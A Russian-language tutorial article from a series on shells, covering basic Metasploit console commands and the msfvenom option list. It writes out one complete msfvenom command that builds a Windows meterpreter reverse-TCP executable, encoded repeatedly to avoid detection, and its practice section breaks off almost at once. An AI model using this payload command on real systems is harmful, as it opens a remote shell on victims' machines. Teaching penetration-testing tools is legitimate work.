НЕ БЕЗ METASPLOIT

Metasploit — это один из самых серьёзных хакерских инструментов. Умение владеть этим инструментом — золотое качество. В этой статье речь пойдёт о его базовом изучении, чтобы не путаться в нём, а так же о практике использования.

ЦИКЛ СТАТЕЙ SHELLCODE

  1. ВСЁ О SHELL
  2. КОМАНДНАЯ СТРОКА WINDOWS
  3. LINUX И ANDROID SHELL
  4. WEB SHELL
  5. НЕ БЕЗ METASPLOIT

ТЕОРИЯ

Основные команды metasploit:

  1. msfconsole — открыть консольный metasploit.
    1. search [название или часть названия] — сразу после открытия ищем нужный эксплоит или пэйлоад.
    2. use [путь] — выбрать по адресу из списка search.
    3. show options — показать опции для текущего выбора.
    4. set [опция] [значение] — установить опцию.
    5. exploit — запустить эксплоит.
    6. run — запустить прослушивание порта для использования полезной нагрузки.
  2. msfvenom — создание приложения.
    1. msfvenom -l payloads — список всех полезных нагрузок.
    2. Опции:
      1
      2
      3
      4
      5
      6
      7
      8
      9
      10
      11
      12
      13
      14
      15
      16
      17
      18
      19
      20
      -l, --list          [тип]       Выводит список типов модулей. Опциями являются: payloads, encoders, nops, platforms, formats, all
      -p, --payload       <нагрузка>  Используемая полезная нагрузка (--list payloads для показа вариантов, --list-options для показа их аргументов). Укажите '-' или STDIN для использования пользовательской полезной нагрузки
          --list-options              Показывает список опций для полезной нагрузки, выбранной опцией --payload
      -f, --format        <формат>    Формат вывода (используйте --list formats для вывода форматов)
      -e, --encoder       <инкодер>   Кодировщик для использования (используйте --list encoders для вывода списка доступных кодировщиков)
          --smallest                  Сегенировать минимально возможную полезную нагрузку, используя все доступные кодировщики
      -a, --arch          <arch>      Архитектура для использования в --payload и--encoders
          --platform      <платформа> Платформа для --payload (используйте --list platforms для вывода списка доступных платформ)
      -o, --out           <путь>      Сохранить полезную нагрузку в файл
      -b, --bad-chars     <список>    Список символов, которые нужно избегать, пример: '\x00\xff'
      -n, --nopsled       <длина>     Подготовить nopsled [длинной] к полезной нагрузке
      -s, --space         <длина>     Максимальная длина конечной полезной нагрузки
          --encoder-space <длина>     Максимальная длина кодированной полезной нагрузки (по умолчанию используется значение из -s)
      -i, --iterations    <счётчик>   Количество раз кодирования полезной нагрузки
      -c, --add-code      <путь>      Укажите дополнительный файл шеллкода win32 для внедрения
      -x, --template      <путь>      Указать пользовательский исполнимый файл для использования в качестве шаблона
      -k, --keep                      Сохранить template behavior и вставить полезную нагрузку как новый поток
      -v, --var-name      <имя>       Укажите имя пользовательской переменной, которое будет использоваться для определенных форматов вывода
      -t, --timeout       <секунды>   Количество секунд ожидания на чтение полезной нагрузки из STDIN (по умолчанию это 30, 0 для отключения)
      -h, --help                      Показать справку

      Обязательными являются две опции: -p and -f.

-a x86 —platform Windows -f exe -p windows/meterpreter/reverse_tcp LHOST=[ip сервера] LPORT=[порт] -e x86/shikata_ga_nai -i 13 -b ‘\x00’ > FileName.exe

ПРАКТИКА

  1. msfconsole

Файл готов.